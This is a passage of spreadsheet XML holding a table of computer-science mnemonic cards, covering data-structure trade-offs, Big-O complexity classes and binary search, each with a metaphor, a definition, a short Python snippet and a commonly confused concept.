        </is>
      </c>
      <c r="K193" t="inlineStr">
        <is>
          <t>Choosing structures: trade-offs</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" t="n">
        <v>0</v>
      </c>
      <c r="B194" t="inlineStr">
        <is>
          <t>192</t>
        </is>
      </c>
      <c r="C194" t="inlineStr">
        <is>
          <t>Space-time trade-off</t>
        </is>
      </c>
      <c r="D194" t="inlineStr">
        <is>
          <t>A chef's mise en place: pre-chopped onions in labeled tubs (memory spent) make dinner service lightning fast; the tiny food cart instead chops to order (time spent) on one clean board.</t>
        </is>
      </c>
      <c r="E194" t="inlineStr">
        <is>
          <t>Spend memory to save computation (caches, indexes, lookup tables) or recompute to save memory - most structure choices sit on this dial.</t>
        </is>
      </c>
      <c r="F194" t="inlineStr">
        <is>
          <t>seen = set(a) # O(n) extra memory / x in seen # O(1), vs 'x in a' rescanning O(n) each time</t>
        </is>
      </c>
      <c r="G194" t="inlineStr">
        <is>
          <t>Compression - compression burns CPU to shrink the SAME data; this trade-off adds redundant structure to make queries faster.</t>
        </is>
      </c>
      <c r="H194" t="inlineStr">
        <is>
          <t>Batch-cooking Sundays.</t>
        </is>
      </c>
      <c r="J194" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K194" t="inlineStr">
        <is>
          <t>Choosing structures: trade-offs</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" t="n">
        <v>0</v>
      </c>
      <c r="B195" t="inlineStr">
        <is>
          <t>193</t>
        </is>
      </c>
      <c r="C195" t="inlineStr">
        <is>
          <t>Cache locality beats pointers</t>
        </is>
      </c>
      <c r="D195" t="inlineStr">
        <is>
          <t>Reading a novel versus a scavenger hunt across town: the novel's next page is already in your hand (prefetched cache line); the hunt's every clue is a bus ride (a ~100x-slower cache miss).</t>
        </is>
      </c>
      <c r="E195" t="inlineStr">
        <is>
          <t>Contiguous data rides cache lines and prefetchers, so scanning an array often crushes a pointer-chasing structure with better big-O.</t>
        </is>
      </c>
      <c r="F195" t="inlineStr">
        <is>
          <t>sum(array) # streams whole cache lines / sum(linked_list) # one RAM round-trip per node</t>
        </is>
      </c>
      <c r="G195" t="inlineStr">
        <is>
          <t>Big-O comparison - asymptotics ignore the ~100x gap between cache hit and RAM miss; locality is why vectors beat lists in practice.</t>
        </is>
      </c>
      <c r="H195" t="inlineStr">
        <is>
          <t>Vinyl needle gliding vs jukebox swapping discs.</t>
        </is>
      </c>
      <c r="J195" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K195" t="inlineStr">
        <is>
          <t>Choosing structures: trade-offs</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" t="n">
        <v>0</v>
      </c>
      <c r="B196" t="inlineStr">
        <is>
          <t>194</t>
        </is>
      </c>
      <c r="C196" t="inlineStr">
        <is>
          <t>Big-O hides constants</t>
        </is>
      </c>
      <c r="D196" t="inlineStr">
        <is>
          <t>Two couriers: one charges 1000 dollars setup plus 1 dollar per mile, the other 10 dollars per mile flat - the 'better rate' courier only wins past mile 111, and all your deliveries are across town.</t>
        </is>
      </c>
      <c r="E196" t="inlineStr">
        <is>
          <t>An O(n) method with huge per-item cost can lose to O(n log n) with tiny constants at every realistic n - asymptotics only promise eventual wins.</t>
        </is>
      </c>
      <c r="F196" t="inlineStr">
        <is>
          <t># galactic algorithm: fancy matmul beats naive only / # for matrices too large for any real computer</t>
        </is>
      </c>
      <c r="G196" t="inlineStr">
        <is>
          <t>Small-n reality - related but distinct: constants matter at every scale; small-n says below some size asymptotics do not apply at all.</t>
        </is>
      </c>
      <c r="H196" t="inlineStr">
        <is>
          <t>Taking a jet two blocks.</t>
        </is>
      </c>
      <c r="J196" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K196" t="inlineStr">
        <is>
          <t>Choosing structures: trade-offs</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" t="n">
        <v>0</v>
      </c>
      <c r="B197" t="inlineStr">
        <is>
          <t>195</t>
        </is>
      </c>
      <c r="C197" t="inlineStr">
        <is>
          <t>Array vs list vs map</t>
        </is>
      </c>
      <c r="D197" t="inlineStr">
        <is>
          <t>Three containers on the decision counter: a numbered pill organizer (array - position is meaning), a valet board of name-tagged hooks (map - find by name), and a paper chain you can snip anywhere (list - splice).</t>
        </is>
      </c>
      <c r="E197" t="inlineStr">
        <is>
          <t>Default to a dynamic array; take a hashmap when keyed lookup dominates; take a linked structure only when O(1) mid-sequence splicing truly matters.</t>
        </is>
      </c>
      <c r="F197" t="inlineStr">
        <is>
          <t>positions matter -&gt; list (array) / lookup by key dominates -&gt; dict / splice with node refs -&gt; linked list</t>
        </is>
      </c>
      <c r="G197" t="inlineStr">
        <is>
          <t>Set vs dict - the same hash machinery; pick a set when membership alone matters, a dict when a value hangs on each key.</t>
        </is>
      </c>
      <c r="H197" t="inlineStr">
        <is>
          <t>Rock-paper-scissors of containers (rejected: implies circular dominance).</t>
        </is>
      </c>
      <c r="J197" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K197" t="inlineStr">
        <is>
          <t>Choosing structures: trade-offs</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" t="n">
        <v>0</v>
      </c>
      <c r="B198" t="inlineStr">
        <is>
          <t>196</t>
        </is>
      </c>
      <c r="C198" t="inlineStr">
        <is>
          <t>Small-n reality</t>
        </is>
      </c>
      <c r="D198" t="inlineStr">
        <is>
          <t>Alphabetizing your spice rack with an industrial warehouse robot: for 12 jars, your eyeballs and one shelf-sweep finish before the robot even boots.</t>
        </is>
      </c>
      <c r="E198" t="inlineStr">
        <is>
          <t>For tiny collections (n under ~100), a linear scan over a compact array beats clever structures - setup cost and cache dwarf asymptotics.</t>
        </is>
      </c>
      <c r="F198" t="inlineStr">
        <is>
          <t>if len(items) &lt; 50: / return [x for x in items if x.key == k] # scan wins / # std::sort itself switches to insertion sort on small ranges</t>
        </is>
      </c>
      <c r="G198" t="inlineStr">
        <is>
          <t>Big-O constants - constants compare algorithms at scale; small-n says that below some size, asymptotic thinking simply does not apply.</t>
        </is>
      </c>
      <c r="H198" t="inlineStr">
        <is>
          <t>Renting a forklift for one grocery bag.</t>
        </is>
      </c>
      <c r="J198" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K198" t="inlineStr">
        <is>
          <t>Choosing structures: trade-offs</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" t="n">
        <v>0</v>
      </c>
      <c r="B199" t="inlineStr">
        <is>
          <t>197</t>
        </is>
      </c>
      <c r="C199" t="inlineStr">
        <is>
          <t>Benchmark before choosing</t>
        </is>
      </c>
      <c r="D199" t="inlineStr">
        <is>
          <t>A mechanic who replaces the engine because the car 'feels slow' - the diagnostic scanner (profiler) would have flagged the dragging parking brake in thirty seconds.</t>
        </is>
      </c>
      <c r="E199" t="inlineStr">
        <is>
          <t>Profile real workloads before swapping structures: intuition about the bottleneck is usually wrong, and the fix belongs where time actually goes.</t>
        </is>
      </c>
      <c r="F199" t="inlineStr">
        <is>
          <t>python -m cProfile app.py / # 97% of time in parse(), not in your dict-vs-list choice</t>
        </is>
      </c>
      <c r="G199" t="inlineStr">
        <is>
          <t>Premature optimization - Knuth's dictum is the principle; 'measure first' is the concrete practice that enforces it. | cf. 970 Measure before optimizing (déjà pris): same discipline, applied here to picking data structures</t>
        </is>
      </c>
      <c r="H199" t="inlineStr">
        <is>
          <t>Doctor prescribing surgery before the X-ray.</t>
        </is>
      </c>
      <c r="J199" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K199" t="inlineStr">
        <is>
          <t>Choosing structures: trade-offs</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" t="n">
        <v>0</v>
      </c>
      <c r="B200" t="inlineStr">
        <is>
          <t>198</t>
        </is>
      </c>
      <c r="C200" t="inlineStr">
        <is>
          <t>Workload shapes the choice</t>
        </is>
      </c>
      <c r="D200" t="inlineStr">
        <is>
          <t>A library versus a loading dock: the library (read-heavy) spends nights re-shelving perfectly so day readers fly; the dock (write-heavy) just stacks incoming pallets by the door and sorts later - LSM-tree style.</t>
        </is>
      </c>
      <c r="E200" t="inlineStr">
        <is>
          <t>Choose for the dominant operation mix: read-heavy data earns indexes and sorted forms; write-heavy data wants cheap appends like logs and buffers.</t>
        </is>
      </c>
      <c r="F200" t="inlineStr">
        <is>
          <t>read-mostly lookup -&gt; sorted tuple + bisect / hot append path -&gt; plain list.append, index later</t>
        </is>
      </c>
      <c r="G200" t="inlineStr">
        <is>
          <t>Space-time trade-off - that dial trades memory for speed; workload choice decides WHO pays the cost, readers or writers.</t>
        </is>
      </c>
      <c r="H200" t="inlineStr">
        <is>
          <t>Restaurant prep kitchen vs food truck.</t>
        </is>
      </c>
      <c r="J200" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K200" t="inlineStr">
        <is>
          <t>Choosing structures: trade-offs</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" t="n">
        <v>0</v>
      </c>
      <c r="B201" t="inlineStr">
        <is>
          <t>199</t>
        </is>
      </c>
      <c r="C201" t="inlineStr">
        <is>
          <t>Structure choice drives design</t>
        </is>
      </c>
      <c r="D201" t="inlineStr">
        <is>
          <t>Fred Brooks at his desk: 'Show me your flowcharts and conceal your tables, and I shall remain mystified; show me your tables and I won't usually need your flowcharts.' The tables ARE the program.</t>
        </is>
      </c>
      <c r="E201" t="inlineStr">
        <is>
          <t>Get the data representation right and the algorithms become obvious - good programmers worry about data structures, not code (Torvalds, Brooks).</t>
        </is>
      </c>
      <c r="F201" t="inlineStr">
        <is>
          <t>git: a content-addressed object graph / # once that model exists, commands are short walks over it</t>
        </is>
      </c>
      <c r="G201" t="inlineStr">
        <is>
          <t>Algorithm-first thinking - the two co-select, but in practice fixing the representation usually settles which algorithm to use.</t>
        </is>
      </c>
      <c r="H201" t="inlineStr">
        <is>
          <t>Blueprint before bricklaying.</t>
        </is>
      </c>
      <c r="J201" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K201" t="inlineStr">
        <is>
          <t>Choosing structures: trade-offs</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" t="n">
        <v>0</v>
      </c>
      <c r="B202" t="inlineStr">
        <is>
          <t>200</t>
        </is>
      </c>
      <c r="C202" t="inlineStr">
        <is>
          <t>Big-O notation</t>
        </is>
      </c>
      <c r="D202" t="inlineStr">
        <is>
          <t>A huge inflatable letter O hangs as a ceiling over a sprinter: however wild the crowd (input) grows, she never jumps above the hoop.</t>
        </is>
      </c>
      <c r="E202" t="inlineStr">
        <is>
          <t>Asymptotic upper bound on growth: f is O(g) if f(n) &lt;= c*g(n) for all large n; constants and lower-order terms are dropped.</t>
        </is>
      </c>
      <c r="F202" t="inlineStr">
        <is>
          <t>3*n**2 + 50*n + 7 is O(n**2) / # constants and lower-order terms dropped</t>
        </is>
      </c>
      <c r="G202" t="inlineStr">
        <is>
          <t>Theta - Big-O is only a ceiling; Theta pins growth from both sides.</t>
        </is>
      </c>
      <c r="H202" t="inlineStr">
        <is>
          <t>A bouncer named Big O capping how fast the club line may grow.</t>
        </is>
      </c>
      <c r="J202" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K202" t="inlineStr">
        <is>
          <t>Complexity &amp; Big-O</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" t="n">
        <v>0</v>
      </c>
      <c r="B203" t="inlineStr">
        <is>
          <t>201</t>
        </is>
      </c>
      <c r="C203" t="inlineStr">
        <is>
          <t>O(1) constant time</t>
        </is>
      </c>
      <c r="D203" t="inlineStr">
        <is>
          <t>A vending machine: punch B4, one clunk, snack drops. The warehouse behind it could hold a million snacks - still one clunk.</t>
        </is>
      </c>
      <c r="E203" t="inlineStr">
        <is>
          <t>Runtime independent of input size: the same fixed number of steps whether n is 10 or 10 billion.</t>
        </is>
      </c>
      <c r="F203" t="inlineStr">
        <is>
          <t>x = arr[42] / d[key] = value # dict insert, avg O(1)</t>
        </is>
      </c>
      <c r="G203" t="inlineStr">
        <is>
          <t>Amortized O(1) - rare operations cost more but the average stays constant (list append during resize).</t>
        </is>
      </c>
      <c r="H203" t="inlineStr">
        <is>
          <t>A light switch: same flick lights one bulb or a stadium.</t>
        </is>
      </c>
      <c r="J203" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K203" t="inlineStr">
        <is>
          <t>Complexity &amp; Big-O</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" t="n">
        <v>0</v>
      </c>
      <c r="B204" t="inlineStr">
        <is>
          <t>202</t>
        </is>
      </c>
      <c r="C204" t="inlineStr">
        <is>
          <t>O(log n) logarithmic time</t>
        </is>
      </c>
      <c r="D204" t="inlineStr">
        <is>
          <t>A phone book ripped in half again and again: 1000 pages become one page in ten savage rips, confetti everywhere, answer found.</t>
        </is>
      </c>
      <c r="E204" t="inlineStr">
        <is>
          <t>One extra step each time n doubles: halving strategies take log2(n) steps - 1 million items in ~20, 4 billion in ~32.</t>
        </is>
      </c>
      <c r="F204" t="inlineStr">
        <is>
          <t>while n &gt; 1: n //= 2 # runs log2(n) times / # 1_000_000 -&gt; ~20 halvings</t>
        </is>
      </c>
      <c r="G204" t="inlineStr">
        <is>
          <t>O(n log n) - that pays a log-cost step for EVERY one of n items, not once.</t>
        </is>
      </c>
      <c r="H204" t="inlineStr">
        <is>
          <t>Guess-my-number 1..100 with higher/lower: 7 guesses max.</t>
        </is>
      </c>
      <c r="J204" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K204" t="inlineStr">
        <is>
          <t>Complexity &amp; Big-O</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" t="n">
        <v>0</v>
      </c>
      <c r="B205" t="inlineStr">
        <is>
          <t>203</t>
        </is>
      </c>
      <c r="C205" t="inlineStr">
        <is>
          <t>O(n) linear time</t>
        </is>
      </c>
      <c r="D205" t="inlineStr">
        <is>
          <t>A toll booth on a one-lane bridge: every single car must slow, pay, pass. Twice the convoy, twice the wait - you watch each bumper crawl by.</t>
        </is>
      </c>
      <c r="E205" t="inlineStr">
        <is>
          <t>Runtime proportional to input size: touch each of n items a constant number of times; double the data, double the time.</t>
        </is>
      </c>
      <c r="F205" t="inlineStr">
        <is>
          <t>total = 0 / for x in arr: total += x</t>
        </is>
      </c>
      <c r="G205" t="inlineStr">
        <is>
          <t>O(log n) - linear must visit every item; logarithmic skips whole halves untouched.</t>
        </is>
      </c>
      <c r="H205" t="inlineStr">
        <is>
          <t>A grocery conveyor belt scanning each item exactly once.</t>
        </is>
      </c>
      <c r="J205" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K205" t="inlineStr">
        <is>
          <t>Complexity &amp; Big-O</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" t="n">
        <v>0</v>
      </c>
      <c r="B206" t="inlineStr">
        <is>
          <t>204</t>
        </is>
      </c>
      <c r="C206" t="inlineStr">
        <is>
          <t>O(n log n) linearithmic time</t>
        </is>
      </c>
      <c r="D206" t="inlineStr">
        <is>
          <t>A stadium of n fans where every fan must climb a short log-spiral staircase to their seat: everyone climbs, but the stairs stay mercifully stubby.</t>
        </is>
      </c>
      <c r="E206" t="inlineStr">
        <is>
          <t>n items each paying a log n toll - the cost of optimal comparison sorting; only slightly steeper than linear in practice.</t>
        </is>
      </c>
      <c r="F206" t="inlineStr">
        <is>
          <t>arr.sort() # Timsort, O(n log n) / # n=1M: ~20M steps, vs 10^12 for n^2</t>
        </is>
      </c>
      <c r="G206" t="inlineStr">
        <is>
          <t>O(n^2) - at n=1M, n log n does ~n*20 work while n^2 does n*1,000,000.</t>
        </is>
      </c>
      <c r="H206" t="inlineStr">
        <is>
          <t>Mergesort tournament bracket: log rounds, n matches per round.</t>
        </is>
      </c>
      <c r="J206" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K206" t="inlineStr">
        <is>
          <t>Complexity &amp; Big-O</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" t="n">
        <v>0</v>
      </c>
      <c r="B207" t="inlineStr">
        <is>
          <t>205</t>
        </is>
      </c>
      <c r="C207" t="inlineStr">
        <is>
          <t>O(n^2) quadratic time</t>
        </is>
      </c>
      <c r="D207" t="inlineStr">
        <is>
          <t>A party where every guest must clink glasses with every other guest: 10 guests, a quick toast; 1000 guests, shattered glass till dawn.</t>
        </is>
      </c>
      <c r="E207" t="inlineStr">
        <is>
          <t>Runtime grows with the square of n, typical of nested loops comparing all pairs; double n, quadruple time.</t>
        </is>
      </c>
      <c r="F207" t="inlineStr">
        <is>
          <t>for i in range(n): / for j in range(n): / check(a[i], a[j])</t>
        </is>
      </c>
      <c r="G207" t="inlineStr">
        <is>
          <t>O(n log n) - nested loops over all pairs are quadratic; smart divide-and-merge is linearithmic.</t>
        </is>
      </c>
      <c r="H207" t="inlineStr">
        <is>
          <t>The handshake formula: n(n-1)/2 handshakes.</t>
        </is>
      </c>
      <c r="J207" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K207" t="inlineStr">
        <is>
          <t>Complexity &amp; Big-O</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" t="n">
        <v>0</v>
      </c>
      <c r="B208" t="inlineStr">
        <is>
          <t>206</t>
        </is>
      </c>
      <c r="C208" t="inlineStr">
        <is>
          <t>Exponential and factorial time</t>
        </is>
      </c>
      <c r="D208" t="inlineStr">
        <is>
          <t>Rice doubling on each chessboard square buries the kingdom by square 64; then a maniac demands to taste the grains in every possible ORDER, and the court faints with a '!'.</t>
        </is>
      </c>
      <c r="E208" t="inlineStr">
        <is>
          <t>O(2^n) doubles with each added element (all subsets); O(n!) multiplies by n (all orderings); both explode past n around 20.</t>
        </is>
      </c>
      <c r="F208" t="inlineStr">
        <is>
          <t>subsets of n items: 2**n / math.factorial(20) # &gt; 2.4e18 orderings</t>
        </is>
      </c>
      <c r="G208" t="inlineStr">
        <is>
          <t>Polynomial time - doubling n only squares or cubes the cost; exponential blows up from adding a SINGLE element.</t>
        </is>
      </c>
      <c r="H208" t="inlineStr">
        <is>
          <t>Gremlins fed after midnight, each splitting in two.</t>
        </is>
      </c>
      <c r="J208" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K208" t="inlineStr">
        <is>
          <t>Complexity &amp; Big-O</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" t="n">
        <v>0</v>
      </c>
      <c r="B209" t="inlineStr">
        <is>
          <t>207</t>
        </is>
      </c>
      <c r="C209" t="inlineStr">
        <is>
          <t>Best, average, worst case</t>
        </is>
      </c>
      <c r="D209" t="inlineStr">
        <is>
          <t>Three commute reports for one road: a dreamy Sunday drive (best), typical Tuesday traffic (average), and the day a parade blocks everything (worst). Same road, three clocks.</t>
        </is>
      </c>
      <c r="E209" t="inlineStr">
        <is>
          <t>The same algorithm costs differently by input: quicksort averages n log n but worst-cases n^2; always state which case a bound describes.</t>
        </is>
      </c>
      <c r="F209" t="inlineStr">
        <is>
          <t>quicksort: avg O(n log n), worst O(n^2) / hash lookup: avg O(1), worst O(n)</t>
        </is>
      </c>
      <c r="G209" t="inlineStr">
        <is>
          <t>Big-O vs cases - O/Omega/Theta are bound TYPES; best/avg/worst are which SCENARIO you bound. You can give the Big-O of a best case.</t>
        </is>
      </c>
      <c r="H209" t="inlineStr">
        <is>
          <t>Weather-forecast runtimes: sunny, typical, hurricane.</t>
        </is>
      </c>
      <c r="J209" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K209" t="inlineStr">
        <is>
          <t>Complexity &amp; Big-O</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" t="n">
        <v>0</v>
      </c>
      <c r="B210" t="inlineStr">
        <is>
          <t>208</t>
        </is>
      </c>
      <c r="C210" t="inlineStr">
        <is>
          <t>Omega and Theta bounds</t>
        </is>
      </c>
      <c r="D210" t="inlineStr">
        <is>
          <t>A trash compactor: the Omega floor rises, the Big-O ceiling drops, and when they meet the algorithm is squeezed Theta-tight - Theta is literally an O with a bar jammed through it.</t>
        </is>
      </c>
      <c r="E210" t="inlineStr">
        <is>
          <t>Omega(g) is an asymptotic floor (at least this much work); Theta(g) is tight - the function is both O(g) and Omega(g).</t>
        </is>
      </c>
      <c r="F210" t="inlineStr">
        <is>
          <t>any comparison sort: Omega(n log n) / mergesort: Theta(n log n) # tight</t>
        </is>
      </c>
      <c r="G210" t="inlineStr">
        <is>
          <t>Big-O - casual speech says O(n log n) meaning Theta; strictly O only promises 'no worse than'.</t>
        </is>
      </c>
      <c r="H210" t="inlineStr">
        <is>
          <t>Omega the horseshoe as a floor you cannot sink below.</t>
        </is>
      </c>
      <c r="J210" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K210" t="inlineStr">
        <is>
          <t>Complexity &amp; Big-O</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" t="n">
        <v>0</v>
      </c>
      <c r="B211" t="inlineStr">
        <is>
          <t>209</t>
        </is>
      </c>
      <c r="C211" t="inlineStr">
        <is>
          <t>Space complexity</t>
        </is>
      </c>
      <c r="D211" t="inlineStr">
        <is>
          <t>A chef whose speed depends on counter space: the mergesort chef wheels in an entire second countertop (O(n)); the in-place chef juggles pans over one burner (O(1)).</t>
        </is>
      </c>
      <c r="E211" t="inlineStr">
        <is>
          <t>Memory an algorithm needs beyond its input, measured asymptotically; includes the recursion stack, and often trades against time.</t>
        </is>
      </c>
      <c r="F211" t="inlineStr">
        <is>
          <t>mergesort: O(n) extra buffer / recursive DFS: O(depth) stack / memoized fib: O(n) cache</t>
        </is>
      </c>
      <c r="G211" t="inlineStr">
        <is>
          <t>Auxiliary vs total space - auxiliary excludes the input itself; 'in-place' means O(1) auxiliary.</t>
        </is>
      </c>
      <c r="H211" t="inlineStr">
        <is>
          <t>A backpacker counting what fits in the pack, not trail length.</t>
        </is>
      </c>
      <c r="J211" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K211" t="inlineStr">
        <is>
          <t>Complexity &amp; Big-O</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" t="n">
        <v>0</v>
      </c>
      <c r="B212" t="inlineStr">
        <is>
          <t>210</t>
        </is>
      </c>
      <c r="C212" t="inlineStr">
        <is>
          <t>Linear search</t>
        </is>
      </c>
      <c r="D212" t="inlineStr">
        <is>
          <t>Lost keys: you pat every pocket in order, coat to jeans, one by one. No shortcut exists, but it works even when your pockets are pure chaos.</t>
        </is>
      </c>
      <c r="E212" t="inlineStr">
        <is>
          <t>Scan items one by one until the target appears or the list ends; O(n), needs no ordering - the only option on unsorted data.</t>
        </is>
      </c>
      <c r="F212" t="inlineStr">
        <is>
          <t>for i, x in enumerate(arr): / if x == target: return i / return -1</t>
        </is>
      </c>
      <c r="G212" t="inlineStr">
        <is>
          <t>Binary search - O(log n) but demands sorted data; linear works unsorted at O(n).</t>
        </is>
      </c>
      <c r="H212" t="inlineStr">
        <is>
          <t>A security guard rattling every locker down the hallway.</t>
        </is>
      </c>
      <c r="J212" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K212" t="inlineStr">
        <is>
          <t>Searching</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" t="n">
        <v>0</v>
      </c>
      <c r="B213" t="inlineStr">
        <is>
          <t>211</t>
        </is>
      </c>
      <c r="C213" t="inlineStr">
        <is>
          <t>Binary search</t>
        </is>
      </c>
      <c r="D213" t="inlineStr">
        <is>
          <t>Dictionary word hunt: flip open dead center - 'M... my word starts with T' - rip away the left half and repeat. Ten rips find any word.</t>
        </is>
      </c>
      <c r="E213" t="inlineStr">
        <is>
          <t>On sorted data, compare the middle element and discard the half that cannot contain the target; O(log n) halvings.</t>
        </is>
      </c>
      <c r="F213" t="inlineStr">
        <is>
          <t>m = (lo + hi) // 2 / if a[m] &lt; t: lo = m + 1 / elif a[m] &gt; t: hi = m - 1 # else found</t>
        </is>
      </c>
      <c r="G213" t="inlineStr">
        <is>
          <t>Binary search tree - same halving idea, but the BST is a data structure; binary search is an algorithm over a sorted array.</t>
        </is>
      </c>
      <c r="H213" t="inlineStr">
        <is>
          <t>The higher/lower number guessing game.</t>
        </is>
      </c>
      <c r="J213" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K213" t="inlineStr">
        <is>
          <t>Searching</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" t="n">
        <v>0</v>
      </c>
      <c r="B214" t="inlineStr">
        <is>
          <t>212</t>
        </is>
      </c>
      <c r="C214" t="inlineStr">
        <is>
          <t>Binary search invariant</t>
        </is>
      </c>
      <c r="D214" t="inlineStr">
        <is>
          <t>Two sheepdogs named Lo and Hi guard a shrinking pen sworn to hold the black sheep. Each bark moves a fence strictly inward - but never past the sheep.</t>
        </is>
      </c>
      <c r="E214" t="inlineStr">
        <is>
          <t>The loop promise: if the target exists, it lies in [lo, hi]; every branch must shrink the range while keeping that promise, or you loop forever.</t>
        </is>
      </c>
      <c r="F214" t="inlineStr">
        <is>
          <t># invariant: target in a[lo..hi] if present / # a[m] &lt; t rules out a[..m], so lo = m+1 keeps it / # empty range (lo &gt; hi) proves absence</t>
        </is>
      </c>
      <c r="G214" t="inlineStr">
        <is>
          <t>Off-by-one bugs - mixing lo &lt; hi with hi = m-1, or lo &lt;= hi with hi = m, blends two invariant styles; pick one and stay loyal.</t>
        </is>
      </c>
      <c r="H214" t="inlineStr">
        <is>
          <t>A shrinking police cordon that provably contains the suspect.</t>
        </is>
      </c>
      <c r="J214" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K214" t="inlineStr">
        <is>
          <t>Searching</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" t="n">
        <v>0</v>
      </c>
      <c r="B215" t="inlineStr">
        <is>
          <t>213</t>
        </is>
      </c>
      <c r="C215" t="inlineStr">
        <is>
          <t>Midpoint overflow bug</t>
        </is>
      </c>
      <c r="D215" t="inlineStr">
        <is>
          <t>Two elephants, Lo and Hi, both step onto one tiny seesaw to find its middle - it snaps under their combined weight. Measure the GAP between them and walk half instead.</t>
        </is>
      </c>
      <c r="E215" t="inlineStr">
        <is>
          <t>In fixed-width integers, mid = (lo+hi)/2 overflows when lo+hi exceeds the max; write lo + (hi-lo)/2 instead (Python ints are immune).</t>
        </is>
      </c>
      <c r="F215" t="inlineStr">
        <is>
          <t>mid = lo + (hi - lo) // 2 # safe / # Java bug: int mid = (lo + hi) / 2 overflows near 2^31</t>
        </is>
      </c>
      <c r="G215" t="inlineStr">
        <is>
          <t>Integer truncation - a different mid subtlety: floor division biases mid low, causing infinite loops in lo = mid style searches.</t>
        </is>
      </c>
      <c r="H215" t="inlineStr">
        <is>
          <t>The 2006 JDK Arrays.binarySearch bug - 'nearly all binary searches are broken'.</t>
        </is>
      </c>
      <c r="J215" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K215" t="inlineStr">
        <is>
          <t>Searching</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" t="n">
        <v>0</v>
      </c>
      <c r="B216" t="inlineStr">
        <is>
          <t>214</t>
        </is>
      </c>
      <c r="C216" t="inlineStr">
        <is>
          <t>bisect_left vs bisect_right</t>
        </is>
      </c>
      <c r="D216" t="inlineStr">
        <is>
          <t>A velvet rope with twin ushers holding signs: Lefty slips you in BEFORE everyone who ties with you; Righty makes you queue AFTER all your ties.</t>
        </is>
      </c>
      <c r="E216" t="inlineStr">
        <is>
          <t>Boundary binary searches: bisect_left gives the first index with a[i] &gt;= x, bisect_right the first with a[i] &gt; x; equal keys sit between them.</t>
        </is>
      </c>
      <c r="F216" t="inlineStr">
        <is>
          <t>from bisect import bisect_left, bisect_right / a = [1,3,3,3,5]; bisect_left(a,3) # 1 / bisect_right(a,3) # 4 -&gt; count of 3s = 3</t>
        </is>
      </c>
      <c r="G216" t="inlineStr">
        <is>
          <t>Plain binary search - returns ANY matching index; the bisect pair pins the exact boundary of the equal run and gives insert points when absent.</t>
        </is>
      </c>
      <c r="H216" t="inlineStr">
        <is>
          <t>C++ lower_bound and upper_bound.</t>
        </is>
      </c>
      <c r="J216" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K216" t="inlineStr">
        <is>
          <t>Searching</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" t="n">
        <v>0</v>
      </c>
      <c r="B217" t="inlineStr">
        <is>
          <t>215</t>
        </is>
      </c>
      <c r="C217" t="inlineStr">
        <is>
          <t>Binary search on answer</t>
        </is>
      </c>
      <c r="D217" t="inlineStr">
        <is>
          <t>Goldilocks with a thermostat: everything below some temperature is 'too cold', everything above is 'fine' - so she halves guesses on the DIAL instead of tasting every porridge in the room.</t>
        </is>
      </c>
      <c r="E217" t="inlineStr">
        <is>
          <t>When feasibility is monotonic in a numeric answer (too small fails, big enough works), binary search candidate answers and test each guess.</t>
        </is>
      </c>
      <c r="F217" t="inlineStr">
        <is>
